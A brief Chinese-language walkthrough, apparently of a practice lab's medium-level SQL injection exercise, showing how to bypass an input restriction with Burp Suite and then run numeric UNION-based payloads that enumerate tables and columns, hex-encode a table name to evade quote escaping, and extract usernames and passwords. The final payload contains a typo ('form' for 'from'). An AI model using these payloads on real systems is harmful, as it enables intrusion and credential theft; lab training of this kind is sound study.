medium级的sql不让用户输入,可以通过burpsuite抓包绕过
一、判断是否有注入点,注入类型、字段数等
1.是否有注入即注入类型
修改为id=1 and 1=1后,如下图:
存在注入点为数字型
2.判断字段数
1 order by 2时:
1 order by 3时:
所以字段数为2
3.确定回显位置
4.查询数据库及版本
5.获取数据库中所有表
1 union select 1,table_name from information_schema.tables where table_schema=database()
该数据库有两张表
6.获取列名
单引号被转义了,所以不能用table_name=‘users‘获取数据,用十六进制绕过
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
列名
7.获取用户和密码
1 union select user,password form users
用户和密码